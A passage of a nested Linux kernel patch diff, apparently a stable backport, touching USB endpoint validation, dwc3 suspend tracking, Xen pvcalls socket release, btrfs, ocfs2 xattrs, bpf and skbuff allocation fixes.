++ * @ep_addrs: 0-terminated array of the endpoint addresses (number and
++ * direction) to look for
++ *
++ * Search for endpoints with the specified addresses and check their types.
++ *
++ * Return: %true if all the endpoints are found and are interrupt,
++ * %false otherwise.
++ */
++bool usb_check_int_endpoints(
++		const struct usb_interface *intf, const u8 *ep_addrs)
++{
++	const struct usb_host_endpoint *ep;
++
++	for (; *ep_addrs; ++ep_addrs) {
++		ep = usb_find_endpoint(intf, *ep_addrs);
++		if (!ep || !usb_endpoint_xfer_int(&ep->desc))
++			return false;
++	}
++	return true;
++}
++EXPORT_SYMBOL_GPL(usb_check_int_endpoints);
++
+ /**
+  * usb_find_alt_setting() - Given a configuration, find the alternate setting
+  * for the given interface.
+diff --git a/drivers/usb/dwc3/core.h b/drivers/usb/dwc3/core.h
+index 582ebd9cf9c2e..bb57bc9bc17cb 100644
+--- a/drivers/usb/dwc3/core.h
++++ b/drivers/usb/dwc3/core.h
+@@ -1110,6 +1110,7 @@ struct dwc3_scratchpad_array {
+  *	3	- Reserved
+  * @dis_metastability_quirk: set to disable metastability quirk.
+  * @dis_split_quirk: set to disable split boundary.
++ * @suspended: set to track suspend event due to U3/L2.
+  * @imod_interval: set the interrupt moderation interval in 250ns
+  *			increments or 0 to disable.
+  * @max_cfg_eps: current max number of IN eps used across all USB configs.
+@@ -1327,6 +1328,7 @@ struct dwc3 {
+ 
+ 	unsigned		dis_split_quirk:1;
+ 	unsigned		async_callbacks:1;
++	unsigned		suspended:1;
+ 
+ 	u16			imod_interval;
+ 
+diff --git a/drivers/usb/dwc3/gadget.c b/drivers/usb/dwc3/gadget.c
+index d12cb8f0d1f48..8cd0d919ef63d 100644
+--- a/drivers/usb/dwc3/gadget.c
++++ b/drivers/usb/dwc3/gadget.c
+@@ -3828,6 +3828,8 @@ static void dwc3_gadget_disconnect_interrupt(struct dwc3 *dwc)
+ {
+ 	int			reg;
+ 
++	dwc->suspended = false;
++
+ 	dwc3_gadget_set_link_state(dwc, DWC3_LINK_STATE_RX_DET);
+ 
+ 	reg = dwc3_readl(dwc->regs, DWC3_DCTL);
+@@ -3859,6 +3861,8 @@ static void dwc3_gadget_reset_interrupt(struct dwc3 *dwc)
+ {
+ 	u32			reg;
+ 
++	dwc->suspended = false;
++
+ 	/*
+ 	 * Ideally, dwc3_reset_gadget() would trigger the function
+ 	 * drivers to stop any active transfers through ep disable.
+@@ -4088,6 +4092,8 @@ static void dwc3_gadget_conndone_interrupt(struct dwc3 *dwc)
+ 
+ static void dwc3_gadget_wakeup_interrupt(struct dwc3 *dwc)
+ {
++	dwc->suspended = false;
++
+ 	/*
+ 	 * TODO take core out of low power mode when that's
+ 	 * implemented.
+@@ -4203,8 +4209,10 @@ static void dwc3_gadget_suspend_interrupt(struct dwc3 *dwc,
+ {
+ 	enum dwc3_link_state next = evtinfo & DWC3_LINK_STATE_MASK;
+ 
+-	if (dwc->link_state != next && next == DWC3_LINK_STATE_U3)
++	if (!dwc->suspended && next == DWC3_LINK_STATE_U3) {
++		dwc->suspended = true;
+ 		dwc3_suspend_gadget(dwc);
++	}
+ 
+ 	dwc->link_state = next;
+ }
+diff --git a/drivers/usb/misc/sisusbvga/sisusb.c b/drivers/usb/misc/sisusbvga/sisusb.c
+index f08de33d9ff38..8ed803c4a251d 100644
+--- a/drivers/usb/misc/sisusbvga/sisusb.c
++++ b/drivers/usb/misc/sisusbvga/sisusb.c
+@@ -3014,6 +3014,20 @@ static int sisusb_probe(struct usb_interface *intf,
+ 	struct usb_device *dev = interface_to_usbdev(intf);
+ 	struct sisusb_usb_data *sisusb;
+ 	int retval = 0, i;
++	static const u8 ep_addresses[] = {
++		SISUSB_EP_GFX_IN | USB_DIR_IN,
++		SISUSB_EP_GFX_OUT | USB_DIR_OUT,
++		SISUSB_EP_GFX_BULK_OUT | USB_DIR_OUT,
++		SISUSB_EP_GFX_LBULK_OUT | USB_DIR_OUT,
++		SISUSB_EP_BRIDGE_IN | USB_DIR_IN,
++		SISUSB_EP_BRIDGE_OUT | USB_DIR_OUT,
++		0};
++
++	/* Are the expected endpoints present? */
++	if (!usb_check_bulk_endpoints(intf, ep_addresses)) {
++		dev_err(&intf->dev, "Invalid USB2VGA device\n");
++		return -EINVAL;
++	}
+ 
+ 	dev_info(&dev->dev, "USB2VGA dongle found at address %d\n",
+ 			dev->devnum);
+diff --git a/drivers/video/fbdev/udlfb.c b/drivers/video/fbdev/udlfb.c
+index 216d49c9d47e5..256d9b61f4eaa 100644
+--- a/drivers/video/fbdev/udlfb.c
++++ b/drivers/video/fbdev/udlfb.c
+@@ -27,6 +27,8 @@
+ #include <video/udlfb.h>
+ #include "edid.h"
+ 
++#define OUT_EP_NUM	1	/* The endpoint number we will use */
++
+ static const struct fb_fix_screeninfo dlfb_fix = {
+ 	.id =           "udlfb",
+ 	.type =         FB_TYPE_PACKED_PIXELS,
+@@ -1652,7 +1654,7 @@ static int dlfb_usb_probe(struct usb_interface *intf,
+ 	struct fb_info *info;
+ 	int retval;
+ 	struct usb_device *usbdev = interface_to_usbdev(intf);
+-	struct usb_endpoint_descriptor *out;
++	static u8 out_ep[] = {OUT_EP_NUM + USB_DIR_OUT, 0};
+ 
+ 	/* usb initialization */
+ 	dlfb = kzalloc(sizeof(*dlfb), GFP_KERNEL);
+@@ -1666,9 +1668,9 @@ static int dlfb_usb_probe(struct usb_interface *intf,
+ 	dlfb->udev = usb_get_dev(usbdev);
+ 	usb_set_intfdata(intf, dlfb);
+ 
+-	retval = usb_find_common_endpoints(intf->cur_altsetting, NULL, &out, NULL, NULL);
+-	if (retval) {
+-		dev_err(&intf->dev, "Device should have at lease 1 bulk endpoint!\n");
++	if (!usb_check_bulk_endpoints(intf, out_ep)) {
++		dev_err(&intf->dev, "Invalid DisplayLink device!\n");
++		retval = -EINVAL;
+ 		goto error;
+ 	}
+ 
+@@ -1927,7 +1929,8 @@ retry:
+ 		}
+ 
+ 		/* urb->transfer_buffer_length set to actual before submit */
+-		usb_fill_bulk_urb(urb, dlfb->udev, usb_sndbulkpipe(dlfb->udev, 1),
++		usb_fill_bulk_urb(urb, dlfb->udev,
++			usb_sndbulkpipe(dlfb->udev, OUT_EP_NUM),
+ 			buf, size, dlfb_urb_completion, unode);
+ 		urb->transfer_flags |= URB_NO_TRANSFER_DMA_MAP;
+ 
+diff --git a/drivers/watchdog/sp5100_tco.c b/drivers/watchdog/sp5100_tco.c
+index fb426b7d81dac..14f8d8d90920f 100644
+--- a/drivers/watchdog/sp5100_tco.c
++++ b/drivers/watchdog/sp5100_tco.c
+@@ -115,6 +115,10 @@ static int tco_timer_start(struct watchdog_device *wdd)
+ 	val |= SP5100_WDT_START_STOP_BIT;
+ 	writel(val, SP5100_WDT_CONTROL(tco->tcobase));
+ 
++	/* This must be a distinct write. */
++	val |= SP5100_WDT_TRIGGER_BIT;
++	writel(val, SP5100_WDT_CONTROL(tco->tcobase));
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/xen/pvcalls-back.c b/drivers/xen/pvcalls-back.c
+index 28b2a1fa25ab5..0bff02ac0045c 100644
+--- a/drivers/xen/pvcalls-back.c
++++ b/drivers/xen/pvcalls-back.c
+@@ -321,8 +321,10 @@ static struct sock_mapping *pvcalls_new_active_socket(
+ 	void *page;
+ 
+ 	map = kzalloc(sizeof(*map), GFP_KERNEL);
+-	if (map == NULL)
++	if (map == NULL) {
++		sock_release(sock);
+ 		return NULL;
++	}
+ 
+ 	map->fedata = fedata;
+ 	map->sock = sock;
+@@ -414,10 +416,8 @@ static int pvcalls_back_connect(struct xenbus_device *dev,
+ 					req->u.connect.ref,
+ 					req->u.connect.evtchn,
+ 					sock);
+-	if (!map) {
++	if (!map)
+ 		ret = -EFAULT;
+-		sock_release(sock);
+-	}
+ 
+ out:
+ 	rsp = RING_GET_RESPONSE(&fedata->ring, fedata->ring.rsp_prod_pvt++);
+@@ -557,7 +557,6 @@ static void __pvcalls_back_accept(struct work_struct *work)
+ 					sock);
+ 	if (!map) {
+ 		ret = -EFAULT;
+-		sock_release(sock);
+ 		goto out_error;
+ 	}
+ 
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index acae82a5f8ee6..21d8a895e9adb 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -5035,7 +5035,11 @@ static void btrfs_destroy_delalloc_inodes(struct btrfs_root *root)
+ 		 */
+ 		inode = igrab(&btrfs_inode->vfs_inode);
+ 		if (inode) {
++			unsigned int nofs_flag;
++
++			nofs_flag = memalloc_nofs_save();
+ 			invalidate_inode_pages2(inode->i_mapping);
++			memalloc_nofs_restore(nofs_flag);
+ 			iput(inode);
+ 		}
+ 		spin_lock(&root->delalloc_lock);
+@@ -5140,7 +5144,12 @@ static void btrfs_cleanup_bg_io(struct btrfs_block_group *cache)
+ 
+ 	inode = cache->io_ctl.inode;
+ 	if (inode) {
++		unsigned int nofs_flag;
++
++		nofs_flag = memalloc_nofs_save();
+ 		invalidate_inode_pages2(inode->i_mapping);
++		memalloc_nofs_restore(nofs_flag);
++
+ 		BTRFS_I(inode)->generation = 0;
+ 		cache->io_ctl.inode = NULL;
+ 		iput(inode);
+diff --git a/fs/cifs/fs_context.c b/fs/cifs/fs_context.c
+index 89e810b27a4bf..e2e2ef0fa9a0f 100644
+--- a/fs/cifs/fs_context.c
++++ b/fs/cifs/fs_context.c
+@@ -904,6 +904,14 @@ static int smb3_fs_context_parse_param(struct fs_context *fc,
+ 			ctx->sfu_remap = false; /* disable SFU mapping */
+ 		}
+ 		break;
++	case Opt_mapchars:
++		if (result.negated)
++			ctx->sfu_remap = false;
++		else {
++			ctx->sfu_remap = true;
++			ctx->remap = false; /* disable SFM (mapposix) mapping */
++		}
++		break;
+ 	case Opt_user_xattr:
+ 		if (result.negated)
+ 			ctx->no_xattr = 1;
+diff --git a/fs/ocfs2/namei.c b/fs/ocfs2/namei.c
+index 05f32989bad6f..1c7ac433667df 100644
+--- a/fs/ocfs2/namei.c
++++ b/fs/ocfs2/namei.c
+@@ -242,6 +242,7 @@ static int ocfs2_mknod(struct user_namespace *mnt_userns,
+ 	int want_meta = 0;
+ 	int xattr_credits = 0;
+ 	struct ocfs2_security_xattr_info si = {
++		.name = NULL,
+ 		.enable = 1,
+ 	};
+ 	int did_quota_inode = 0;
+@@ -1805,6 +1806,7 @@ static int ocfs2_symlink(struct user_namespace *mnt_userns,
+ 	int want_clusters = 0;
+ 	int xattr_credits = 0;
+ 	struct ocfs2_security_xattr_info si = {
++		.name = NULL,
+ 		.enable = 1,
+ 	};
+ 	int did_quota = 0, did_quota_inode = 0;
+diff --git a/fs/ocfs2/xattr.c b/fs/ocfs2/xattr.c
+index 95d0611c5fc7d..55699c5735413 100644
+--- a/fs/ocfs2/xattr.c
++++ b/fs/ocfs2/xattr.c
+@@ -7259,9 +7259,21 @@ static int ocfs2_xattr_security_set(const struct xattr_handler *handler,
+ static int ocfs2_initxattrs(struct inode *inode, const struct xattr *xattr_array,
+ 		     void *fs_info)
+ {
++	struct ocfs2_security_xattr_info *si = fs_info;
+ 	const struct xattr *xattr;
+ 	int err = 0;
+ 
++	if (si) {
++		si->value = kmemdup(xattr_array->value, xattr_array->value_len,
++				    GFP_KERNEL);
++		if (!si->value)
++			return -ENOMEM;
++
++		si->name = xattr_array->name;
++		si->value_len = xattr_array->value_len;
++		return 0;
++	}
++
+ 	for (xattr = xattr_array; xattr->name != NULL; xattr++) {
+ 		err = ocfs2_xattr_set(inode, OCFS2_XATTR_INDEX_SECURITY,
+ 				      xattr->name, xattr->value,
+@@ -7277,13 +7289,23 @@ int ocfs2_init_security_get(struct inode *inode,
+ 			    const struct qstr *qstr,
+ 			    struct ocfs2_security_xattr_info *si)
+ {
++	int ret;
++
+ 	/* check whether ocfs2 support feature xattr */
+ 	if (!ocfs2_supports_xattr(OCFS2_SB(dir->i_sb)))
+ 		return -EOPNOTSUPP;
+-	if (si)
+-		return security_old_inode_init_security(inode, dir, qstr,
+-							&si->name, &si->value,
+-							&si->value_len);
++	if (si) {
++		ret = security_inode_init_security(inode, dir, qstr,
++						   &ocfs2_initxattrs, si);
++		/*
++		 * security_inode_init_security() does not return -EOPNOTSUPP,
++		 * we have to check the xattr ourselves.
++		 */
++		if (!ret && !si->name)
++			si->enable = 0;
++
++		return ret;
++	}
+ 
+ 	return security_inode_init_security(inode, dir, qstr,
+ 					    &ocfs2_initxattrs, NULL);
+diff --git a/include/drm/drm_managed.h b/include/drm/drm_managed.h
+index 359883942612e..ad08f834af408 100644
+--- a/include/drm/drm_managed.h
++++ b/include/drm/drm_managed.h
+@@ -105,6 +105,22 @@ char *drmm_kstrdup(struct drm_device *dev, const char *s, gfp_t gfp);
+ 
+ void drmm_kfree(struct drm_device *dev, void *data);
+ 
+-int drmm_mutex_init(struct drm_device *dev, struct mutex *lock);
++void __drmm_mutex_release(struct drm_device *dev, void *res);
++
++/**
++ * drmm_mutex_init - &drm_device-managed mutex_init()
++ * @dev: DRM device
++ * @lock: lock to be initialized
++ *
++ * Returns:
++ * 0 on success, or a negative errno code otherwise.
++ *
++ * This is a &drm_device-managed version of mutex_init(). The initialized
++ * lock is automatically destroyed on the final drm_dev_put().
++ */
++#define drmm_mutex_init(dev, lock) ({					     \
++	mutex_init(lock);						     \
++	drmm_add_action_or_reset(dev, __drmm_mutex_release, lock);	     \
++})									     \
+ 
+ #endif
+diff --git a/include/linux/arm_ffa.h b/include/linux/arm_ffa.h
+index 5f02d2e6b9d9d..c617b179c26c2 100644
+--- a/include/linux/arm_ffa.h
++++ b/include/linux/arm_ffa.h
+@@ -13,6 +13,7 @@
+ 
+ /* FFA Bus/Device/Driver related */
+ struct ffa_device {
++	u32 id;
+ 	int vm_id;
+ 	bool mode_32bit;
+ 	uuid_t uuid;
+diff --git a/include/linux/fs.h b/include/linux/fs.h
+index f14ecbeab2a9d..a2b5592c68284 100644
+--- a/include/linux/fs.h
++++ b/include/linux/fs.h
+@@ -1380,29 +1380,29 @@ extern int send_sigurg(struct fown_struct *fown);
+  * sb->s_flags.  Note that these mirror the equivalent MS_* flags where
+  * represented in both.
+  */
+-#define SB_RDONLY	 1	/* Mount read-only */
+-#define SB_NOSUID	 2	/* Ignore suid and sgid bits */
+-#define SB_NODEV	 4	/* Disallow access to device special files */
+-#define SB_NOEXEC	 8	/* Disallow program execution */
+-#define SB_SYNCHRONOUS	16	/* Writes are synced at once */
+-#define SB_MANDLOCK	64	/* Allow mandatory locks on an FS */
+-#define SB_DIRSYNC	128	/* Directory modifications are synchronous */
+-#define SB_NOATIME	1024	/* Do not update access times. */
+-#define SB_NODIRATIME	2048	/* Do not update directory access times */
+-#define SB_SILENT	32768
+-#define SB_POSIXACL	(1<<16)	/* VFS does not apply the umask */
+-#define SB_INLINECRYPT	(1<<17)	/* Use blk-crypto for encrypted files */
+-#define SB_KERNMOUNT	(1<<22) /* this is a kern_mount call */
+-#define SB_I_VERSION	(1<<23) /* Update inode I_version field */
+-#define SB_LAZYTIME	(1<<25) /* Update the on-disk [acm]times lazily */
++#define SB_RDONLY       BIT(0)	/* Mount read-only */
++#define SB_NOSUID       BIT(1)	/* Ignore suid and sgid bits */
++#define SB_NODEV        BIT(2)	/* Disallow access to device special files */
++#define SB_NOEXEC       BIT(3)	/* Disallow program execution */
++#define SB_SYNCHRONOUS  BIT(4)	/* Writes are synced at once */
++#define SB_MANDLOCK     BIT(6)	/* Allow mandatory locks on an FS */
++#define SB_DIRSYNC      BIT(7)	/* Directory modifications are synchronous */
++#define SB_NOATIME      BIT(10)	/* Do not update access times. */
++#define SB_NODIRATIME   BIT(11)	/* Do not update directory access times */
++#define SB_SILENT       BIT(15)
++#define SB_POSIXACL     BIT(16)	/* VFS does not apply the umask */
++#define SB_INLINECRYPT  BIT(17)	/* Use blk-crypto for encrypted files */
++#define SB_KERNMOUNT    BIT(22)	/* this is a kern_mount call */
++#define SB_I_VERSION    BIT(23)	/* Update inode I_version field */
++#define SB_LAZYTIME     BIT(25)	/* Update the on-disk [acm]times lazily */
+ 
+ /* These sb flags are internal to the kernel */
+-#define SB_SUBMOUNT     (1<<26)
+-#define SB_FORCE    	(1<<27)
+-#define SB_NOSEC	(1<<28)
+-#define SB_BORN		(1<<29)
+-#define SB_ACTIVE	(1<<30)
+-#define SB_NOUSER	(1<<31)
++#define SB_SUBMOUNT     BIT(26)
++#define SB_FORCE        BIT(27)
++#define SB_NOSEC        BIT(28)
++#define SB_BORN         BIT(29)
++#define SB_ACTIVE       BIT(30)
++#define SB_NOUSER       BIT(31)
+ 
+ /* These flags relate to encoding and casefolding */
+ #define SB_ENC_STRICT_MODE_FL	(1 << 0)
+diff --git a/include/linux/if_team.h b/include/linux/if_team.h
+index fc985e5c739d4..8de6b6e678295 100644
+--- a/include/linux/if_team.h
++++ b/include/linux/if_team.h
+@@ -208,6 +208,7 @@ struct team {
+ 	bool queue_override_enabled;
+ 	struct list_head *qom_lists; /* array of queue override mapping lists */
+ 	bool port_mtu_change_allowed;
++	bool notifier_ctx;
+ 	struct {
+ 		unsigned int count;
+ 		unsigned int interval; /* in ms */
+diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h
+index 097cbf84c1e05..b2aee17a34d77 100644
+--- a/include/linux/mlx5/mlx5_ifc.h
++++ b/include/linux/mlx5/mlx5_ifc.h
+@@ -1639,7 +1639,9 @@ struct mlx5_ifc_cmd_hca_cap_bits {
+ 	u8         rc[0x1];
+ 
+ 	u8         uar_4k[0x1];
+-	u8         reserved_at_241[0x9];
++	u8         reserved_at_241[0x7];
++	u8         fl_rc_qp_when_roce_disabled[0x1];
++	u8         regexp_params[0x1];
+ 	u8         uar_sz[0x6];
+ 	u8         port_selection_cap[0x1];
+ 	u8         reserved_at_248[0x1];
+diff --git a/include/linux/msi.h b/include/linux/msi.h
+index fc918a658d480..e5dfb9cf3aa11 100644
+--- a/include/linux/msi.h
++++ b/include/linux/msi.h
+@@ -278,6 +278,13 @@ int arch_setup_msi_irq(struct pci_dev *dev, struct msi_desc *desc);
+ void arch_teardown_msi_irq(unsigned int irq);
+ int arch_setup_msi_irqs(struct pci_dev *dev, int nvec, int type);
+ void arch_teardown_msi_irqs(struct pci_dev *dev);
++#endif /* CONFIG_PCI_MSI_ARCH_FALLBACKS */
++
++/*
++ * Xen uses non-default msi_domain_ops and hence needs a way to populate sysfs
++ * entries of MSI IRQs.
++ */
++#if defined(CONFIG_PCI_XEN) || defined(CONFIG_PCI_MSI_ARCH_FALLBACKS)
+ #ifdef CONFIG_SYSFS
+ int msi_device_populate_sysfs(struct device *dev);
+ void msi_device_destroy_sysfs(struct device *dev);
+@@ -285,7 +292,7 @@ void msi_device_destroy_sysfs(struct device *dev);
+ static inline int msi_device_populate_sysfs(struct device *dev) { return 0; }
+ static inline void msi_device_destroy_sysfs(struct device *dev) { }
+ #endif /* !CONFIG_SYSFS */
+-#endif /* CONFIG_PCI_MSI_ARCH_FALLBACKS */
++#endif /* CONFIG_PCI_XEN || CONFIG_PCI_MSI_ARCH_FALLBACKS */
+ 
+ /*
+  * The restore hook is still available even for fully irq domain based
+diff --git a/include/linux/power/bq27xxx_battery.h b/include/linux/power/bq27xxx_battery.h
+index a1aa68141d0b5..7c8d65414a70a 100644
+--- a/include/linux/power/bq27xxx_battery.h
++++ b/include/linux/power/bq27xxx_battery.h
+@@ -2,6 +2,8 @@
+ #ifndef __LINUX_BQ27X00_BATTERY_H__
+ #define __LINUX_BQ27X00_BATTERY_H__
+ 
++#include <linux/power_supply.h>
++
+ enum bq27xxx_chip {
+ 	BQ27000 = 1, /* bq27000, bq27200 */
+ 	BQ27010, /* bq27010, bq27210 */
+@@ -68,7 +70,9 @@ struct bq27xxx_device_info {
+ 	struct bq27xxx_access_methods bus;
+ 	struct bq27xxx_reg_cache cache;
+ 	int charge_design_full;
++	bool removed;
+ 	unsigned long last_update;
++	union power_supply_propval last_status;
+ 	struct delayed_work work;
+ 	struct power_supply *bat;
+ 	struct list_head list;
+diff --git a/include/linux/tpm.h b/include/linux/tpm.h
+index dfeb25a0362de..4e22e4f4cec85 100644
+--- a/include/linux/tpm.h
++++ b/include/linux/tpm.h
+@@ -273,13 +273,15 @@ enum tpm2_cc_attrs {
+ #define TPM_VID_ATML     0x1114
+ 
+ enum tpm_chip_flags {
+-	TPM_CHIP_FLAG_TPM2		= BIT(1),
+-	TPM_CHIP_FLAG_IRQ		= BIT(2),
+-	TPM_CHIP_FLAG_VIRTUAL		= BIT(3),
+-	TPM_CHIP_FLAG_HAVE_TIMEOUTS	= BIT(4),
+-	TPM_CHIP_FLAG_ALWAYS_POWERED	= BIT(5),
++	TPM_CHIP_FLAG_BOOTSTRAPPED		= BIT(0),
++	TPM_CHIP_FLAG_TPM2			= BIT(1),
++	TPM_CHIP_FLAG_IRQ			= BIT(2),
++	TPM_CHIP_FLAG_VIRTUAL			= BIT(3),
++	TPM_CHIP_FLAG_HAVE_TIMEOUTS		= BIT(4),
++	TPM_CHIP_FLAG_ALWAYS_POWERED		= BIT(5),
+ 	TPM_CHIP_FLAG_FIRMWARE_POWER_MANAGED	= BIT(6),
+-	TPM_CHIP_FLAG_FIRMWARE_UPGRADE	= BIT(7),
++	TPM_CHIP_FLAG_FIRMWARE_UPGRADE		= BIT(7),
++	TPM_CHIP_FLAG_SUSPENDED			= BIT(8),
+ };
+ 
+ #define to_tpm_chip(d) container_of(d, struct tpm_chip, dev)
+diff --git a/include/linux/usb.h b/include/linux/usb.h
+index 6c95af3317f73..3ce7b052a19f5 100644
+--- a/include/linux/usb.h
++++ b/include/linux/usb.h
+@@ -279,6 +279,11 @@ void usb_put_intf(struct usb_interface *intf);
+ #define USB_MAXINTERFACES	32
+ #define USB_MAXIADS		(USB_MAXINTERFACES/2)
+ 
++bool usb_check_bulk_endpoints(
++		const struct usb_interface *intf, const u8 *ep_addrs);
++bool usb_check_int_endpoints(
++		const struct usb_interface *intf, const u8 *ep_addrs);
++
+ /*
+  * USB Resume Timer: Every Host controller driver should drive the resume
+  * signalling on the bus for the amount of time defined by this macro.
+diff --git a/include/net/bonding.h b/include/net/bonding.h
+index 123729c0e1ee1..17329a19f0c64 100644
+--- a/include/net/bonding.h
++++ b/include/net/bonding.h
+@@ -223,6 +223,7 @@ struct bonding {
+ 	struct   bond_up_slave __rcu *usable_slaves;
+ 	struct   bond_up_slave __rcu *all_slaves;
+ 	bool     force_primary;
++	bool     notifier_ctx;
+ 	s32      slave_cnt; /* never change this value outside the attach/detach wrappers */
+ 	int     (*recv_probe)(const struct sk_buff *, struct bonding *,
+ 			      struct slave *);
+diff --git a/include/uapi/sound/skl-tplg-interface.h b/include/uapi/sound/skl-tplg-interface.h
+index f29899b179a62..4bf9c4f9add8a 100644
+--- a/include/uapi/sound/skl-tplg-interface.h
++++ b/include/uapi/sound/skl-tplg-interface.h
+@@ -66,7 +66,8 @@ enum skl_ch_cfg {
+ 	SKL_CH_CFG_DUAL_MONO = 9,
+ 	SKL_CH_CFG_I2S_DUAL_STEREO_0 = 10,
+ 	SKL_CH_CFG_I2S_DUAL_STEREO_1 = 11,
+-	SKL_CH_CFG_4_CHANNEL = 12,
++	SKL_CH_CFG_7_1 = 12,
++	SKL_CH_CFG_4_CHANNEL = SKL_CH_CFG_7_1,
+ 	SKL_CH_CFG_INVALID
+ };
+ 
+diff --git a/kernel/bpf/hashtab.c b/kernel/bpf/hashtab.c
+index 4a3d0a7447026..e4e7f343346f9 100644
+--- a/kernel/bpf/hashtab.c
++++ b/kernel/bpf/hashtab.c
+@@ -1203,7 +1203,7 @@ static int htab_lru_map_update_elem(struct bpf_map *map, void *key, void *value,
+ 
+ 	ret = htab_lock_bucket(htab, b, hash, &flags);
+ 	if (ret)
+-		return ret;
++		goto err_lock_bucket;
+ 
+ 	l_old = lookup_elem_raw(head, hash, key, key_size);
+ 
+@@ -1224,6 +1224,7 @@ static int htab_lru_map_update_elem(struct bpf_map *map, void *key, void *value,
+ err:
+ 	htab_unlock_bucket(htab, b, hash, flags);
+ 
++err_lock_bucket:
+ 	if (ret)
+ 		htab_lru_push_free(htab, l_new);
+ 	else if (l_old)
+@@ -1326,7 +1327,7 @@ static int __htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
+ 
+ 	ret = htab_lock_bucket(htab, b, hash, &flags);
+ 	if (ret)
+-		return ret;
++		goto err_lock_bucket;
+ 
+ 	l_old = lookup_elem_raw(head, hash, key, key_size);
+ 
+@@ -1349,6 +1350,7 @@ static int __htab_lru_percpu_map_update_elem(struct bpf_map *map, void *key,
+ 	ret = 0;
+ err:
+ 	htab_unlock_bucket(htab, b, hash, flags);
++err_lock_bucket:
+ 	if (l_new)
+ 		bpf_lru_push_free(&htab->lru, &l_new->lru_node);
+ 	return ret;
+diff --git a/kernel/bpf/verifier.c b/kernel/bpf/verifier.c
+index 322a2ae8f88b0..280e689517e10 100644
+--- a/kernel/bpf/verifier.c
++++ b/kernel/bpf/verifier.c
+@@ -13638,7 +13638,7 @@ static int convert_ctx_accesses(struct bpf_verifier_env *env)
+ 					insn_buf[cnt++] = BPF_ALU64_IMM(BPF_RSH,
+ 									insn->dst_reg,
+ 									shift);
+-				insn_buf[cnt++] = BPF_ALU64_IMM(BPF_AND, insn->dst_reg,
++				insn_buf[cnt++] = BPF_ALU32_IMM(BPF_AND, insn->dst_reg,
+ 								(1ULL << size * 8) - 1);
+ 			}
+ 		}
+diff --git a/kernel/irq/msi.c b/kernel/irq/msi.c
+index a9ee535293eb2..77e513e2e5da7 100644
+--- a/kernel/irq/msi.c
++++ b/kernel/irq/msi.c
+@@ -420,7 +420,7 @@ fail:
+ 	return ret;
+ }
+ 
+-#ifdef CONFIG_PCI_MSI_ARCH_FALLBACKS
++#if defined(CONFIG_PCI_MSI_ARCH_FALLBACKS) || defined(CONFIG_PCI_XEN)
+ /**
+  * msi_device_populate_sysfs - Populate msi_irqs sysfs entries for a device
+  * @dev:	The device (PCI, platform etc) which will get sysfs entries
+@@ -452,7 +452,7 @@ void msi_device_destroy_sysfs(struct device *dev)
+ 	msi_for_each_desc(desc, dev, MSI_DESC_ALL)
+ 		msi_sysfs_remove_desc(dev, desc);
+ }
+-#endif /* CONFIG_PCI_MSI_ARCH_FALLBACK */
++#endif /* CONFIG_PCI_MSI_ARCH_FALLBACK || CONFIG_PCI_XEN */
+ #else /* CONFIG_SYSFS */
+ static inline int msi_sysfs_create_group(struct device *dev) { return 0; }
+ static inline int msi_sysfs_populate_desc(struct device *dev, struct msi_desc *desc) { return 0; }
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index bdfd859cccaf2..c46736210363a 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -126,7 +126,7 @@ static const char *obj_states[ODEBUG_STATE_MAX] = {
+ 
+ static void fill_pool(void)
+ {
+-	gfp_t gfp = GFP_ATOMIC | __GFP_NORETRY | __GFP_NOWARN;
++	gfp_t gfp = __GFP_HIGH | __GFP_NOWARN;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+ 
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 47660002cadaf..ef9772b12624c 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -506,14 +506,14 @@ struct sk_buff *__alloc_skb(unsigned int size, gfp_t gfp_mask,
+ 	 */
+ 	size = SKB_DATA_ALIGN(size);
+ 	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
+-	data = kmalloc_reserve(size, gfp_mask, node, &pfmemalloc);
++	osize = kmalloc_size_roundup(size);
++	data = kmalloc_reserve(osize, gfp_mask, node, &pfmemalloc);
+ 	if (unlikely(!data))
+ 		goto nodata;
+-	/* kmalloc(size) might give us more room than requested.
++	/* kmalloc_size_roundup() might give us more room than requested.
+ 	 * Put skb_shared_info exactly at the end of allocated zone,
+ 	 * to allow max possible filling before reallocation.
+ 	 */
+-	osize = ksize(data);
+ 	size = SKB_WITH_OVERHEAD(osize);
+ 	prefetchw(data + size);
+ 
+@@ -1822,10 +1822,11 @@ EXPORT_SYMBOL(__pskb_copy_fclone);
+ int pskb_expand_head(struct sk_buff *skb, int nhead, int ntail,
+ 		     gfp_t gfp_mask)
+ {
+-	int i, osize = skb_end_offset(skb);
+-	int size = osize + nhead + ntail;
++	unsigned int osize = skb_end_offset(skb);
++	unsigned int size = osize + nhead + ntail;
+ 	long off;
+ 	u8 *data;
++	int i;
+ 
+ 	BUG_ON(nhead < 0);
+ 
+@@ -1833,15 +1834,16 @@ int pskb_expand_head(struct sk_buff *skb, int nhead, int ntail,
+ 
+ 	skb_zcopy_downgrade_managed(skb);
+ 
+-	size = SKB_DATA_ALIGN(size);
+-
+ 	if (skb_pfmemalloc(skb))
+ 		gfp_mask |= __GFP_MEMALLOC;
+-	data = kmalloc_reserve(size + SKB_DATA_ALIGN(sizeof(struct skb_shared_info)),
+-			       gfp_mask, NUMA_NO_NODE, NULL);
++
++	size = SKB_DATA_ALIGN(size);
++	size += SKB_DATA_ALIGN(sizeof(struct skb_shared_info));
++	size = kmalloc_size_roundup(size);
++	data = kmalloc_reserve(size, gfp_mask, NUMA_NO_NODE, NULL);
+ 	if (!data)
+ 		goto nodata;
+-	size = SKB_WITH_OVERHEAD(ksize(data));
++	size = SKB_WITH_OVERHEAD(size);
+ 
+ 	/* Copy only real data... and, alas, header. This should be
+ 	 * optimized for the cases when header is void.
+@@ -4981,8 +4983,10 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb,
+ 	} else {
+ 		skb = skb_clone(orig_skb, GFP_ATOMIC);
+ 
+-		if (skb_orphan_frags_rx(skb, GFP_ATOMIC))
